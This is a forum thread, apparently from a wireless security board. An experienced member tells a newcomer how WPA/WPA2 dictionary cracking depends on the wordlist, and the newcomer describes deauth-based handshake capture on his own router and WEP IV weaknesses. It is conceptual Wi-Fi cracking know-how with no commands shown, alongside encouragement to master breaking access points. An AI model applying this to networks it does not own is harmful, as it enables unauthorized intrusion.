Hello davidjnr, and welcome to remote-exploit!
I like your enthusiasm.
To be honest, Ive always been interested in the encrytion side of things from watching Sneakers lol and World War 2 stories of the Enigma machine and our Bletchley Park.
Let me start by saying that there is more than one way to skin a cat. But the cold harsh reality is that if your passphrase is NOT in your dictionary...you cant Brute Force it....PERIOD...forget what everyone else has told you..or what you have heard..their wrong. Plain and simple. I have 2 videos on cracking WPA/WPA2..one basic..and one where I use airolib and mysql databases to precompute a table of hashes with your essid.
The basic one is found here...
Let me make this as clear as possible....
If your passphrase is david123 and you have 100,000 gigabytes or 1,000,000,000 petabytes ...and your passphrase is NOT IN THAT DATABASE or DICTIONARY..IT WILL FAIL!!! You can have every word in the whole English or World language..and if that passphrase is NOT in that database or wordlist..it won't work.
So are you saying that to some extend WPA2 is a good encryption method if you use a passkey like 123qerdfvwsthq34rtw/73erfgvc , dependant upon the length it is still possible to create your own wordlist of words and numbers dependant upon the length of the passkey its still possible but would take longer to crack. Also, loadsof hard disk drive space needed and CPU! , but also if its not in the dictionary file then if cannot be cracked.
In most peoples cases the router key will not change from the factory setting and are therefore more known then I suppose you could backtrack your wordlist from there on the router passkeys length.
Yes..a precomputed hash table database WILL SPEED UP THE PROCESS GREATLY...but if its not in that database..your S.O.L my friend.
My suggestion to you davidjnr, is to master cracking WEP and WPA/WPA2
BEFORE you tread the waters of -=Xploiting=-. Metasploit..nessus ..nmap..are all great tools..but if you cant break the AP..then you don't need the tools cause you won't be able to use them until you crack the AP.
Ive cracked my own router at home, I dont really want to mess with the router at work just incase i do break it , I have at work switched off the wireless element to be on the safe side for now.
My understanding of WEP is that in order to create the traffic you are sending say a block of data ie abcdefghijklmnopqrstuvwxyz the same data round and round in circles but it creates everytime a different encryption header (IV) at the begining of abc etc data stream and its this variation in the encryption header that you can then use via an mathematical forumlua to then with a high certain of probability obtain the encrytion key? I just find this well fasinating as if im back in time at bletchley park in their shoes cracking troop movements etc. I would have thought that the router would blocked out this type of attack?
Cracking WPA2 is only by collecting the security handshake between client and router. I used in this example my wireless radio by deauth attack, but then I just made my own passphase list of 5 words with my passkey in there to see if it worked to save time.
I understand that the encryption of AES is not crackable just yet, but the TKIP can be?
Focus on that..and use nessus instead of nmap. I prefer nessus over nmap any day.
Newbie
Originally Posted by davidjnr
